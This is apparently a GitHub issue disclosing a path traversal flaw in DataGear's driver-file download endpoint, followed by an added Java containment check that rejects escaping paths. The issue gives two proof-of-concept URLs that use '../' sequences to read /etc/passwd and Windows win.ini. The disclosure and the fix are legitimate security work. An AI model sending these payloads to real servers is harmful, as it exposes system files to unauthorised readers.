Firebasky opened this issue 3 years ago · 2 comments
Dear friend, this project has a security vulnerability.
poc: url/driverEntity/downloadDriverFile?id=1?file=../../.../../../../../../../etc/passwd
The vulnerability is in the datagear-web module.
poc:
/driverEntity/downloadDriverFile?id=1&file=../../.../../../../../../../../../Windows/win.ini
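
A containment check of the kind that rejects the `file` values shown in this report, sketched in Java as an added example; it is not part of the original issue and not DataGear's own code. The class name `SafeDriverFileResolver`, the method `resolve` and the one-directory-per-driver layout are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

// Added example with hypothetical names; not DataGear's own code.
public class SafeDriverFileResolver {
    // Resolve the client-supplied "file" value inside one driver's directory,
    // rejecting anything that ends up outside it.
    static Path resolve(Path driverDir, String requested) throws IOException {
        if (requested == null || requested.isEmpty() || requested.indexOf('\0') >= 0) {
            throw new SecurityException("empty or malformed file name");
        }
        Path base = driverDir.toRealPath();
        Path candidate;
        try {
            // Treat '\' as a separator too so the check is the same on every OS.
            candidate = base.resolve(requested.replace('\\', '/')).normalize();
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed file name");
        }
        // An absolute value replaces base in resolve(); "../" segments climb out
        // of it once normalize() collapses them. Both fail this containment test.
        if (!candidate.startsWith(base) || candidate.equals(base)) {
            throw new SecurityException("path escapes driver directory");
        }
        // Follow symlinks on an existing file and re-check its real location.
        if (Files.exists(candidate) && !candidate.toRealPath().startsWith(base)) {
            throw new SecurityException("symlink escapes driver directory");
        }
        return candidate;
    }
    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("driver-1"); // constructed sample directory
        Files.createFile(dir.resolve("driver.jar"));      // constructed sample file
        String[] inputs = {
            "driver.jar",
            "../../.../../../../../../../etc/passwd",            // value from the report
            "../../.../../../../../../../../../Windows/win.ini"  // value from the report
        };
        for (String in : inputs) {
            try {
                System.out.println("ALLOW " + resolve(dir, in));
            } catch (SecurityException e) {
                System.out.println("DENY  " + in + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The check runs on the normalized path rather than on the raw string, so it does not depend on filtering particular `../` spellings.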